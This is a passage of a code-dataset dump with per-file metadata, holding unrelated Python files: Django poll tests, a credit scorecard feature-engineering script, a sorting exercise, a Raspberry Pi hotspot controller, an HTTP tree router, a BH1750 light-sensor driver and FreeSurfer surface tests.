        create_question(question_text='Past question1', days=-30)\n        create_question(question_text='Past question2', days=-5)\n        response = self.client.get(reverse('polls:index'))\n        self.assertQuerysetEqual(\n            response.context['latest_question_list'],\n            ['<Question: Past question2>', '<Question: Past question1>']\n        )\n\n\n# --------\nclass QuestionDetailViewTests(TestCase):\n    def test_future_question(self):\n        \"\"\"\n        The detail view of a question with a pub_date in the future returns a 404 not found.\n        :return:\n        \"\"\"\n        future_question = create_question(question_text='Future question.', days=5)\n        url = reverse(\"polls:detail\", args=(future_question.id,))\n        response = self.client.get(url)\n        self.assertEqual(response.status_code, 404)\n\n    def test_past_question(self):\n        \"\"\"\n        The detail view of a question with a pub_date in the past displays the\n        question's text.\n        :return:\n        \"\"\"\n        past_question = create_question(question_text='Past question.', days=-5)\n        url = reverse('polls:detail', args=(past_question.id,))\n        response = self.client.get(url)\n        self.assertContains(response, past_question.question_text)","sub_path":"weiwc/polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"415620631","text":"import time\nimport unittest\n\nfrom app.provider import AppServiceProvider\nfrom core import annotation_base, LoggerFactory, Env, ApplicationState\nfrom core.common import Common\nfrom domain.integrator import DomainIntegrator\n\n\ndef unit(**kwargs):\n    return annotation_base(None, **kwargs)\n\n\ndef integration(**kwargs):\n    return annotation_base(None, **kwargs)\n\n\nlogger = LoggerFactory.get_instance(\"UnitTest\")\n\n\nclass BaseTest(unittest.TestCase):\n    def setUp(self):\n        app_state = ApplicationState(env=Env.TEST, version=\"xxx\")\n        self.common = Common(app_state=app_state)\n        self.common.start()\n        self.integrator = DomainIntegrator(common=self.common, app_state=app_state)\n        domains = self.integrator.get_domains()\n        self.app_provider = AppServiceProvider(common=self.common, app_state=app_state,\n                                               domains=domains)\n\n    def sleep(self, sec):\n        time.sleep(sec)\n","sub_path":"test/unit/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"333361791","text":"\n\nfrom xai.brain.wordbase.nouns._triangle import _TRIANGLE\n\n# class header\nclass _TRIANGLES(_TRIANGLE):\n\tdef __init__(self):\n\t\t_TRIANGLE.__init__(self)\n\t\tself.name = \"TRIANGLES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"triangle\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_triangles.py","file_name":"_triangles.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"227859583","text":"import pandas as pd\nimport datetime\nimport collections\nimport numpy as np\nimport numbers\nimport random\nimport sys\nimport pickle\nfrom itertools import combinations\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nimport statsmodels.api as sm\nfrom importlib import reload\nfrom matplotlib import pyplot as plt\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\nfrom scorecard_functions import *\nfrom sklearn.linear_model import LogisticRegressionCV\n# -*- coding: utf-8 -*-\n\n################################\n
######## UDF: user-defined functions ########\n################################\n### For each time window, compute the cumulative frequency ###\ndef TimeWindowSelection(df, daysCol, time_windows):\n    '''\n    :param df: the dataset containing the variable of days\n    :param daysCol: the column of days\n    :param time_windows: the list of time windows\n    :return:\n    '''\n    freq_tw = {}\n    for tw in time_windows:\n        freq = sum(df[daysCol].apply(lambda x: int(x<=tw)))\n        freq_tw[tw] = freq\n    return freq_tw\n\n\ndef DeivdedByZero(numerator, denominator):\n    '''\n    Return 0 when the denominator is 0; otherwise return the normal quotient.\n    '''\n    if denominator == 0:\n        return 0\n    else:\n        return numerator*1.0/denominator\n\n\n# unify fields that refer to the same thing\ndef ChangeContent(x):\n    y = x.upper()\n    if y == '_MOBILEPHONE':\n        y = '_PHONE'\n    return y\n\n\n\ndef MissingCategorial(df,x):\n    missing_vals = df[x].map(lambda x: int(x!=x))\n    return sum(missing_vals)*1.0/df.shape[0]\n\ndef MissingContinuous(df,x):\n    missing_vals = df[x].map(lambda x: int(np.isnan(x)))\n    return sum(missing_vals) * 1.0 / df.shape[0]\n\ndef MakeupRandom(x, sampledList):\n    if x==x:\n        return x\n    else:\n        randIndex = random.randint(0, len(sampledList)-1)\n        return sampledList[randIndex]\n\n\n\n############################################################\n# Step 0: initial work for the analysis: read the data files, check user Id consistency, etc. #\n############################################################\nfolderOfData = '/Users/Code/Data Collections/bank default/'\ndata1 = pd.read_csv(folderOfData+'PPD_LogInfo_3_1_Training_Set.csv', header = 0)\ndata2 = pd.read_csv(folderOfData+'PPD_Training_Master_GBK_3_1_Training_Set.csv', header = 0,encoding = 'gbk')\ndata3 = pd.read_csv(folderOfData+'PPD_Userupdate_Info_3_1_Training_Set.csv', header = 0)\n\n#############################################################################################\n# Step 1: derive features from PPD_LogInfo_3_1_Training_Set & PPD_Userupdate_Info_3_1_Training_Set #\n#############################################################################################\n# compare whether the four city variables match\ndata2['city_match'] = data2.apply(lambda x: int(x.UserInfo_2 == x.UserInfo_4 == x.UserInfo_8 == x.UserInfo_20),axis = 1)\ndel data2['UserInfo_2']\ndel data2['UserInfo_4']\ndel data2['UserInfo_8']\ndel data2['UserInfo_20']\n\n### extract the application date, compute the day gap, and inspect its distribution\ndata1['logInfo'] = data1['LogInfo3'].map(lambda x: datetime.datetime.strptime(x,'%Y-%m-%d'))\ndata1['Listinginfo'] = data1['Listinginfo1'].map(lambda x: datetime.datetime.strptime(x,'%Y-%m-%d'))\ndata1['ListingGap'] = data1[['logInfo','Listinginfo']].apply(lambda x: (x[1]-x[0]).days,axis = 1)\nplt.hist(data1['ListingGap'],bins=200)\nplt.title('Days between login date and listing date')\nListingGap2 = data1['ListingGap'].map(lambda x: min(x,365))\nplt.hist(ListingGap2,bins=200)\n\ntimeWindows = TimeWindowSelection(data1, 'ListingGap', range(30,361,30))\n\n'''\nUse 180 days as the maximum time window to compute the new features.\nThe available time windows are 7 days, 30 days, 60 days, 90 days, 120 days, 150 days and 180 days.\nWithin each time window, compute the total number of logins, the number of distinct login types, and the average count per login type.\n'''\ntime_window = [7, 30, 60, 90, 120, 150, 180]\nvar_list = ['LogInfo1','LogInfo2']\ndata1GroupbyIdx = pd.DataFrame({'Idx':data1['Idx'].drop_duplicates()})\n\nfor tw in time_window:\n    data1['TruncatedLogInfo'] = data1['Listinginfo'].map(lambda x: x + datetime.timedelta(-tw))\n    temp = data1.loc[data1['logInfo'] >= data1['TruncatedLogInfo']]\n    for var in var_list:\n        # count the frequencies of LogInfo1 and LogInfo2\n        count_stats = temp.groupby(['Idx'])[var].count().to_dict()\n        data1GroupbyIdx[str(var)+'_'+str(tw)+'_count'] = data1GroupbyIdx['Idx'].map(lambda x: count_stats.get(x,0))\n\n
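# [editor's note] Tiny usage sketch for TimeWindowSelection() defined above,
# with invented data:
#
#   demo = pd.DataFrame({'ListingGap': [3, 10, 40, 95]})
#   TimeWindowSelection(demo, 'ListingGap', [30, 60, 90])
#   # -> {30: 2, 60: 3, 90: 3}  (cumulative counts of rows within each window)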
        # count the distinct values of LogInfo1 and LogInfo2\n        Idx_UserupdateInfo1 = temp[['Idx', var]].drop_duplicates()\n        uniq_stats = Idx_UserupdateInfo1.groupby(['Idx'])[var].count().to_dict()\n        data1GroupbyIdx[str(var) + '_' + str(tw) + '_unique'] = data1GroupbyIdx['Idx'].map(lambda x: uniq_stats.get(x,0))\n\n        # calculate the average count of each value in LogInfo1 and LogInfo2\n        data1GroupbyIdx[str(var) + '_' + str(tw) + '_avg_count'] = data1GroupbyIdx[[str(var)+'_'+str(tw)+'_count',str(var) + '_' + str(tw) + '_unique']].\\\n            apply(lambda x: DeivdedByZero(x[0],x[1]), axis=1)\n\n\ndata3['ListingInfo'] = data3['ListingInfo1'].map(lambda x: datetime.datetime.strptime(x,'%Y/%m/%d'))\ndata3['UserupdateInfo'] = data3['UserupdateInfo2'].map(lambda x: datetime.datetime.strptime(x,'%Y/%m/%d'))\ndata3['ListingGap'] = data3[['UserupdateInfo','ListingInfo']].apply(lambda x: (x[1]-x[0]).days,axis = 1)\ncollections.Counter(data3['ListingGap'])\nhist_ListingGap = np.histogram(data3['ListingGap'])\nhist_ListingGap = pd.DataFrame({'Freq':hist_ListingGap[0],'gap':hist_ListingGap[1][1:]})\nhist_ListingGap['CumFreq'] = hist_ListingGap['Freq'].cumsum()\nhist_ListingGap['CumPercent'] = hist_ListingGap['CumFreq'].map(lambda x: x*1.0/hist_ListingGap.iloc[-1]['CumFreq'])\n\n'''\nUnify pairs such as QQ and qQ, Idnumber and idNumber, MOBILEPHONE and PHONE.\nWithin each time slice, compute\n    (1) the update frequency\n    (2) the number of distinct updated items\n    (3) whether important items such as IDNUMBER, HASBUYCAR, MARRIAGESTATUSID and PHONE were updated\n'''\ndata3['UserupdateInfo1'] = data3['UserupdateInfo1'].map(ChangeContent)\ndata3GroupbyIdx = pd.DataFrame({'Idx':data3['Idx'].drop_duplicates()})\n\ntime_window = [7, 30, 60, 90, 120, 150, 180]\nfor tw in time_window:\n    data3['TruncatedLogInfo'] = data3['ListingInfo'].map(lambda x: x + datetime.timedelta(-tw))\n    temp = data3.loc[data3['UserupdateInfo'] >= data3['TruncatedLogInfo']]\n\n    # frequency of updating\n    freq_stats = temp.groupby(['Idx'])['UserupdateInfo1'].count().to_dict()\n    data3GroupbyIdx['UserupdateInfo_'+str(tw)+'_freq'] = data3GroupbyIdx['Idx'].map(lambda x: freq_stats.get(x,0))\n\n    # number of updated types\n    Idx_UserupdateInfo1 = temp[['Idx','UserupdateInfo1']].drop_duplicates()\n    uniq_stats = Idx_UserupdateInfo1.groupby(['Idx'])['UserupdateInfo1'].count().to_dict()\n    data3GroupbyIdx['UserupdateInfo_' + str(tw) + '_unique'] = data3GroupbyIdx['Idx'].map(lambda x: uniq_stats.get(x, 0))\n\n    # average count of each type\n    data3GroupbyIdx['UserupdateInfo_' + str(tw) + '_avg_count'] = data3GroupbyIdx[['UserupdateInfo_'+str(tw)+'_freq', 'UserupdateInfo_' + str(tw) + '_unique']].\\\n        apply(lambda x: x[0] * 1.0 / x[1], axis=1)\n
\n    # whether the applicant changed items like IDNUMBER, HASBUYCAR, MARRIAGESTATUSID, PHONE\n    Idx_UserupdateInfo1['UserupdateInfo1'] = Idx_UserupdateInfo1['UserupdateInfo1'].map(lambda x: [x])\n    Idx_UserupdateInfo1_V2 = Idx_UserupdateInfo1.groupby(['Idx'])['UserupdateInfo1'].sum()\n    for item in ['_IDNUMBER','_HASBUYCAR','_MARRIAGESTATUSID','_PHONE']:\n        item_dict = Idx_UserupdateInfo1_V2.map(lambda x: int(item in x)).to_dict()\n        data3GroupbyIdx['UserupdateInfo_' + str(tw) + str(item)] = data3GroupbyIdx['Idx'].map(lambda x: item_dict.get(x, 0))\n\n# Combine the above features with raw features in PPD_Training_Master_GBK_3_1_Training_Set\nallData = pd.concat([data2.set_index('Idx'), data3GroupbyIdx.set_index('Idx'), data1GroupbyIdx.set_index('Idx')],axis= 1)\nallData.to_csv(folderOfData+'allData_0.csv',encoding = 'gbk')\n\n\n\n\n#######################################\n# Step 2: impute missing values for categorical and numerical variables #\n######################################\nallData = pd.read_csv(folderOfData+'allData_0.csv',header = 0,encoding = 'gbk')\nallFeatures = list(allData.columns)\nallFeatures.remove('target')\nif 'Idx' in allFeatures:\n    allFeatures.remove('Idx')\nallFeatures.remove('ListingInfo')\n\n# check for constant variables, and decide whether each remaining variable is categorical or numerical\nnumerical_var = []\nfor col in list(allFeatures):  # iterate over a copy: the loop removes items from allFeatures\n    if len(set(allData[col])) == 1:\n        print('delete {} from the dataset because it is a constant'.format(col))\n        del allData[col]\n        allFeatures.remove(col)\n    else:\n        #uniq_vals = list(set(allData[col]))\n        #if np.nan in uniq_vals:\n        #uniq_vals.remove(np.nan)\n        uniq_valid_vals = [i for i in allData[col] if i == i]\n        uniq_valid_vals = list(set(uniq_valid_vals))\n        if len(uniq_valid_vals) >= 10 and isinstance(uniq_valid_vals[0], numbers.Real):\n            numerical_var.append(col)\n\ncategorical_var = [i for i in allFeatures if i not in numerical_var]\n\n# check the share of the most frequent value of each variable, and record that value\nrecords_count = allData.shape[0]\ncol_most_values,col_large_value = {},{}\nfor col in allFeatures:\n    value_count = allData[col].groupby(allData[col]).count()\n    col_most_values[col] = max(value_count)/records_count\n    large_value = value_count[value_count== max(value_count)].index[0]\n    col_large_value[col] = large_value\ncol_most_values_df = pd.DataFrame.from_dict(col_most_values, orient = 'index')\ncol_most_values_df.columns = ['max percent']\ncol_most_values_df = col_most_values_df.sort_values(by = 'max percent', ascending = False)\npcnt = list(col_most_values_df[:500]['max percent'])\nvars = list(col_most_values_df[:500].index)\nplt.bar(range(len(pcnt)), height = pcnt)\nplt.title('Largest Percentage of Single Value in Each Variable')\n\n# for fields whose majority value covers more than 90% of records, test whether the bad-sample rate of the minority values is significantly higher than that of the majority value\nlarge_percent_cols = list(col_most_values_df[col_most_values_df['max percent']>=0.9].index)\nbad_rate_diff = {}\nfor col in large_percent_cols:\n    large_value = col_large_value[col]\n    temp = allData[[col,'target']]\n    temp[col] = temp.apply(lambda x: int(x[col]==large_value),axis=1)\n    bad_rate = temp.groupby(col).mean()\n    if bad_rate.iloc[0]['target'] == 0:\n        bad_rate_diff[col] = 0\n        continue\n    bad_rate_diff[col] = np.log(bad_rate.iloc[0]['target']/bad_rate.iloc[1]['target'])\nbad_rate_diff_sorted = sorted(bad_rate_diff.items(),key=lambda x: x[1], reverse=True)\nbad_rate_diff_sorted_values = [x[1] for x in bad_rate_diff_sorted]\nplt.bar(x = range(len(bad_rate_diff_sorted_values)), height = bad_rate_diff_sorted_values)\n\n# since none of the minority values show a significantly higher bad-sample rate than the majority value, these variables can simply be dropped\nfor col in large_percent_cols:\n    if col in numerical_var:\n        numerical_var.remove(col)\n    else:\n        categorical_var.remove(col)\n    del allData[col]\n
\n'''\nFor categorical variables: drop the variable if more than 80% of its values are missing; otherwise treat missing as a special category.\n'''\nmissing_pcnt_threshold_1 = 0.8\nfor col in list(categorical_var):  # iterate over a copy: the loop removes items\n    missingRate = MissingCategorial(allData,col)\n    print('{0} has missing rate as {1}'.format(col,missingRate))\n    if missingRate > missing_pcnt_threshold_1:\n        categorical_var.remove(col)\n        del allData[col]\n    if 0 < missingRate < missing_pcnt_threshold_1:\n        # In this way we convert NaN to NAN, which is a string instead of np.nan\n        allData[col] = allData[col].map(lambda x: str(x).upper())\n\nallData_bk = allData.copy()\n'''\nCheck the numerical variables.\n'''\nmissing_pcnt_threshold_2 = 0.8\ndeleted_var = []\nfor col in numerical_var:\n    missingRate = MissingContinuous(allData, col)\n    print('{0} has missing rate as {1}'.format(col, missingRate))\n    if missingRate > missing_pcnt_threshold_2:\n        deleted_var.append(col)\n        print('we delete variable {} because of its high missing rate'.format(col))\n    else:\n        if missingRate > 0:\n            not_missing = allData.loc[allData[col] == allData[col]][col]\n            #makeuped = allData[col].map(lambda x: MakeupRandom(x, list(not_missing)))\n            missing_position = allData.loc[allData[col] != allData[col]][col].index\n            not_missing_sample = random.sample(list(not_missing), len(missing_position))\n            allData.loc[missing_position,col] = not_missing_sample\n            #del allData[col]\n            #allData[col] = makeuped\n            missingRate2 = MissingContinuous(allData, col)\n            print('missing rate after making up is:{}'.format(str(missingRate2)))\n\nif deleted_var != []:\n    for col in deleted_var:\n        numerical_var.remove(col)\n        del allData[col]\n\n\nallData.to_csv(folderOfData+'allData_1.csv', header=True,encoding='gbk', columns = allData.columns, index=False)","sub_path":"天善智能-如何搭建金融信贷风控中的机器学习模型/第三章/scorecard model development.py","file_name":"scorecard model development.py","file_ext":"py","file_size_in_byte":12981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"49454947","text":"import sys\nfrom hashlib import sha256\nfrom base64 import b32encode\n\ndef get_oid(s):\n    return \"oid1\"+b32encode(sha256(s).digest()[:20]).decode().lower() # \"oid1\" + 160 bits of sha256, base32 encoded, converted to lowercase\n\nif __name__==\"__main__\":\n    f = open(sys.argv[1], 'rb')\n    s = f.read()\n    f.close()\n    print(get_oid(s))\n","sub_path":"oid.py","file_name":"oid.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"11112319","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# sort_wyb.py\n#\n\nimport random\n\n\ndef losuj(liczby, ileliczb, maksliczb):\n\n    ile = 0  # number of unique values drawn so far\n\n    # for i in range(ileliczb):\n    while ile < ileliczb:\n        liczba = random.randint(0, maksliczb)\n        if liczby.count(liczba) == 0:\n            liczby.append(liczba)\n            ile += 1\n\n    return liczby\n\n\ndef sort_wyb(tab):\n    # selection sort\n    print(\" ------------- Selection sort ---------------\")\n    for i in range(len(tab)):\n        k = i\n        for j in range(i + 1, len(tab)):\n            if tab[j] < tab[k]:\n                k = j\n        tab[i], tab[k] = tab[k], tab[i]\n    return tab\n\n\ndef main(args):\n    ile = 10\n    tab = []  # start empty; losuj() fills in exactly `ile` unique numbers\n    maksliczb = int(input('Enter the maximum number: '))\n    print(losuj(tab, ile, maksliczb))\n    print(sort_wyb(tab))\n    return 0\n\n\nif __name__ == '__main__':\n    import sys\n    
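# [editor's note] One hand-traced run of sort_wyb() above, on an invented list:
#
#   [4, 1, 3] -> i=0: min is 1 at k=1, swap -> [1, 4, 3]
#                i=1: min is 3 at k=2, swap -> [1, 3, 4]
#                i=2: nothing left to swap  -> [1, 3, 4]
#
# Each outer pass fixes one position, giving the usual O(n^2) comparisons.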
sys.exit(main(sys.argv))\n","sub_path":"python/sort_wyb.py","file_name":"sort_wyb.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"482046606","text":"#!/usr/bin/env python3\n\nimport time\nimport serial\n#import urllib.request\nimport json\nimport PyCmdMessenger\nimport csv\n#import requests\nimport glob\nimport subprocess\nimport sys\nimport random\nimport smtplib\nimport logging\nimport logging.handlers\nimport shutil\nimport os.path\nimport threading\nfrom bottle import request, route, run, static_file\n\ncommands = [[\"response_cmd\", \"s*\"],\n [\"ping_cmd\",\"\"],\n [\"log_cmd\",\"\"],\n [\"start_hotsport_cmd\", \"\"],\n [\"hotsport_cmd\", \"\"],\n [\"stop_hotsport_cmd\", \"\"]\n \n ]\n\n\n\n\n\nlogger=logging.getLogger(\"node\")\nlogger.setLevel(logging.INFO)\n#fh=logging.FileHandler(\"/media/usb0/vertigo.log\")\n#fh=logging.handlers.TimedRotatingFileHandler(\"/media/usb0/valerian.log\",when=\"d\",interval=1,backupCount=10) \nfh=logging.handlers.TimedRotatingFileHandler(\"node.log\",when=\"d\",interval=1,backupCount=10) \nfh.setLevel(logging.INFO)\nch= logging.StreamHandler()\nch.setLevel(logging.INFO)\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\n\n\n@route('/')\ndef index():\n return static_file(\"index.html\",root=\"./\")\n\n\n@route('/save_restart')\ndef save_restart():\n stop_hotspot() \n return static_file(\"index.html\",root=\"./\")\n\n\ndef start_hotspot():\n logger.info(\"Start hotspot\")\n\n shutil.copyfile(\"../config/boot/hotspot.txt.example\",\"/boot/hotspot.txt\")\n\n subprocess.call([\"reboot\"])\n\n\ndef stop_hotspot():\n \n logger.info(\"Stop hotspot\")\n \n client.send(commands[5][0])\n try:\n os.remove(\"/boot/hotspot.txt\")\n except OSError:\n pass\n\n subprocess.call([\"reboot\"])\n\n\n\n\nif __name__==\"__main__\":\n\n logger.info(\"Start.\")\n\n threading.Thread(target=run, kwargs=dict(host='0.0.0.0', port=9000)).start()\n\n arduino = PyCmdMessenger.ArduinoBoard(\"/dev/ttyAMA0\",baud_rate=9600)\n global client\n client = PyCmdMessenger.CmdMessenger(arduino, commands,field_separator=\"|\")\n\n\n while True:\t\n response = client.receive()\n logger.info(response)\n\n if os.path.isfile(\"/boot/hotspot.txt\"):\n client.send(commands[4][0])\n \n\n if response is None:\n continue\n\n print (response[0])\n if response[0]==commands[3][0] and not os.path.isfile(\"/boot/hotspot.txt\"):\n start_hotspot()\n\n\n \n\n \n","sub_path":"linux/src/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"633366166","text":"#--------------------------------------------------------------------------------\n# Copyright (c) 2013, MediaSift Ltd\n# All rights reserved.\n# Distribution of this software is strictly forbidden under the terms of this\n# license.\n#\n# Author: Claude Gibert\n#\n#--------------------------------------------------------------------------------\n\"\"\"\nA router to which we pass a list of callables, an http verb and a \"path\".\nPaths can be added dynamically, for example:\nrouter.registerAction('/store/definition',action)\nIn this approach, arguments are supposed to be urlencoded or sent\nin the body of a POST request.\n\"\"\"\nfrom ..core.basic import make_list\nfrom lib.service import 
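# [editor's note] Sketch of the serial round trip node.py above performs, using
# only the PyCmdMessenger calls already present in that file; the reply shape
# is indicative, not guaranteed:
#
#   board = PyCmdMessenger.ArduinoBoard("/dev/ttyAMA0", baud_rate=9600)
#   link = PyCmdMessenger.CmdMessenger(board, commands, field_separator="|")
#   link.send(commands[1][0])     # "ping_cmd"
#   link.receive()                # e.g. ["response_cmd", ["..."], <timestamp>]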
Service\nfrom lib.router import Router\n\n\nclass TreeRouter(Router):\n def registerAction(self, path, action, verbs, **kwargs):\n levels = path.split('/')\n self._server.putChild(levels[0], Service(self, self._server))\n self._actions = self.storeAction(self._actions, action, levels, set(make_list(verbs)), kwargs)\n\n # for the Service \n def findAction(self, levels, verb, request):\n node = self._actions\n for level in levels:\n if level in node:\n node = node[level]\n else:\n return None, None, None\n verbs = node[1]\n kwargs = node[2]\n node = node[0]\n if callable(node):\n if verb in verbs:\n return node, None, kwargs\n return None, None, None\n\n # protected \n def storeAction(self, where, action, levels, verbs, kwargs):\n if len(levels) > 0:\n level = levels[0]\n if level in where:\n entry = where[level]\n else:\n entry = {}\n where[level] = self.storeAction(entry, action, levels[1:], verbs, kwargs)\n else:\n return (action, verbs, kwargs)\n return where\n\n # for the HTTPServer\n\n def rootNode(self):\n return self._server\n","sub_path":"build/lib/platin/httpservices/treerouter.py","file_name":"treerouter.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"339216257","text":"from utime import sleep_us\r\n\r\n\"\"\"\r\n ->See the datasheet\r\n ____|___________________________________|_____\r\n | power_off -> 0x00 |\r\n | power_on -> 0x01 |\r\n | reset -> 0x07 |\r\n | cont_h_res_mode -> 0x10 |\r\n | cont_h_res_mode2 -> 0x11 |\r\n | cont_l_res_mode -> 0x13 |\r\n | onet_h_res_mode -> 0x20 |\r\n | onet_h_res_mode2 -> 0x21 |\r\n | onet_l_res_mode -> 0x23 |\r\n ____|___________________________________|_____\r\n\"\"\"\r\n\r\nBH1750_I2C_ADDRESS_PRIM = 0x23;\r\nBH1750_I2C_ADDRESS_SEC = 0x5C;\r\n\r\nMODE_DICT = {'CHR': 0x10, 'CHR2': 0x11, 'CLR': 0x13, 'OHR': 0x20, 'OHR2': 0x21, 'OLR': 0x23}\r\n\r\nclass BH1750:\r\n def __init__(self, i2c=None, address=None):\r\n if address == None:\r\n self._address = BH1750_I2C_ADDRESS_PRIM\r\n self.scanI2CAddress(i2c)\r\n else:\r\n self._address = address\r\n self._mode = None\r\n self._i2c = i2c\r\n self.power_off()\r\n self.reset()\r\n self.power_on()\r\n\r\n def scanI2CAddress(self, i2c):\r\n \"\"\"scans I2C adresses of the bme280 if finds 2 device then automatically select the primary adress\"\"\"\r\n print('Scan i2c bus...')\r\n devices = i2c.scan()\r\n\r\n if devices:\r\n for d in devices:\r\n print(\"Decimal address: \", d, \" | Hex address: \", hex(d))\r\n if d in [BH1750_I2C_ADDRESS_PRIM, BH1750_I2C_ADDRESS_SEC]:\r\n print(\"Connected decimal address: \", d)\r\n self._address = d\r\n return\r\n else:\r\n raise ValueError(\"I2C object is mandatory\")\r\n\r\n def power_on(self):\r\n self._i2c.writeto(self._address, bytes([0x01]))\r\n\r\n def power_off(self):\r\n self._i2c.writeto(self._address, bytes([0x00]))\r\n\r\n def reset(self):\r\n self._i2c.writeto(self._address, bytes([0x07]))\r\n\r\n def set_mode(self,mode_code = None):\r\n if mode_code == None:\r\n print(\"Please write a mode code\\n\"\r\n \"->Mode codes :\\n\"\r\n \"\\'CHR\\' for Continuous High Resolution Mode\\n\"\r\n \"\\'CHR2\\' for Continuous High Resolution Mode 2\\n\"\r\n \"\\'CLR\\' for Continuous Low Resolution Mode\\n\"\r\n \"\\'OHR\\' for One Time High Resolution Mode\\n\"\r\n \"\\'OHR2\\' for One Time High Resolution Mode\\n\"\r\n \"\\'OLR\\' for One Time Low Resolution Mode\\n\")\r\n else:\r\n new_mode = MODE_DICT.get(mode_code)\r\n if new_mode is None :\r\n raise 
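# [editor's note] What the TreeRouter._actions trie above looks like after one
# registration, assuming a hypothetical callable `define`:
#
#   router.registerAction('store/definition', define, 'GET')
#   # _actions == {'store': {'definition': (define, {'GET'}, {})}}
#
# findAction() then walks one dict level per path segment and finally checks
# that the request verb is in the stored verb set.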
ValueError(\"\\nPlease write an available mode code\\n\"\r\n \"->Mode codes :\\n\"\r\n \"\\'CHR\\' for Continuous High Resolution Mode\\n\"\r\n \"\\'CHR2\\' for Continuous High Resolution Mode 2\\n\"\r\n \"\\'CLR\\' for Continuous Low Resolution Mode\\n\"\r\n \"\\'OHR\\' for One Time High Resolution Mode\\n\"\r\n \"\\'OHR2\\' for One Time High Resolution Mode\\n\"\r\n \"\\'OLR\\' for One Time Low Resolution Mode\\n\")\r\n if new_mode & 0x20:\r\n self._mode = new_mode;\r\n self._i2c.writeto(self._address, bytes([self._mode]))\r\n else:\r\n if new_mode != self._mode:\r\n self._mode = new_mode;\r\n self._i2c.writeto(self._address, bytes([self._mode]))\r\n\r\n\r\n\r\n\r\n def lux(self):\r\n if self._mode is None:\r\n raise ValueError(\"\\nNo mode selected !\\nPlease chose a mode with set_mode method !\")\r\n return\r\n\r\n sleep_us(24 if self._mode in (0x13, 0x23) else 180)\r\n data = self._i2c.readfrom(self._address, 2)\r\n factor = 2.0 if self._mode in (0x11, 0x21) else 1.0\r\n\r\n return (data[0] << 8 | data[1]) / (1.2 * factor)","sub_path":"libs/modbus_bh1750/lib/bh1750.py","file_name":"bh1750.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"564336840","text":"##########################################################################\n# NSAp - Copyright (C) CEA, 2016\n# Distributed under the terms of the CeCILL-B license, as published by\n# the CEA-CNRS-INRIA. Refer to the LICENSE file or to\n# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html\n# for details.\n##########################################################################\n\n# System import\nfrom collections import namedtuple\nimport unittest\nimport sys\nimport math\nimport numpy\n# COMPATIBILITY: since python 3.3 mock is included in unittest module\npython_version = sys.version_info\nif python_version[:2] <= (3, 3):\n import mock\n from mock import patch\n mock_builtin = \"__builtin__\"\nelse:\n import unittest.mock as mock\n from unittest.mock import patch\n mock_builtin = \"builtins\"\n\n# Pyfreesurfer import\nfrom pyfreesurfer.utils.surftools import apply_affine_on_mesh\nfrom pyfreesurfer.utils.filetools import TriSurface\n\n\nclass FreeSurferTriSurface(unittest.TestCase):\n \"\"\" Test the triangular surface structure:\n 'pyfreesurfer.utils.surftools.TriSurface'\n \"\"\"\n def setUp(self):\n \"\"\" Define function parameters.\n \"\"\"\n # Construct an eight-sided polyhedron.\n f = math.sqrt(2.0) / 2.0\n verts = [\n (0, -1, 0),\n (-f, 0, f),\n (f, 0, f),\n (f, 0, -f),\n (-f, 0, -f),\n (0, 1, 0)]\n faces = [\n (0, 2, 1),\n (0, 3, 2),\n (0, 4, 3),\n (0, 1, 4),\n (5, 1, 2),\n (5, 2, 3),\n (5, 3, 4),\n (5, 4, 1)]\n labels = range(6)\n meta = dict((index, {\"color\": (1, 1, 1, 1)}) for index in labels)\n\n self.kwargs = {\n \"vertices\": numpy.asarray(verts),\n \"triangles\": numpy.asarray(faces),\n \"inflated_vertices\": numpy.asarray(verts)\n }\n\n def test_normal_execution(self):\n \"\"\" Test the normal behaviour of the function.\n \"\"\"\n # Test execution\n surf = TriSurface(**self.kwargs)\n self.assertTrue(numpy.allclose(self.kwargs[\"vertices\"],\n surf.vertices))\n self.assertTrue(numpy.allclose(self.kwargs[\"triangles\"],\n surf.triangles))\n self.assertTrue(numpy.allclose(self.kwargs[\"inflated_vertices\"],\n surf.inflated_vertices))\n self.assertEqual(surf.shape(), (6, 18, 8))\n\n\nclass FreeSurferApplyAffine(unittest.TestCase):\n \"\"\" Test the apply affine transformation to vertices function:\n 
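# [editor's note] Worked lux conversion from the BH1750 driver above: a raw
# reading of 0x1234 in a high-resolution mode (factor 1.0) gives
#   (0x12 << 8 | 0x34) / (1.2 * 1.0) = 4660 / 1.2 ~= 3883 lx.
# One thing worth double-checking against the datasheet: typical measurement
# times are 16-24 ms (low res) and 120-180 ms (high res), so the
# sleep_us(24/180) calls above look like they were meant to be milliseconds.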
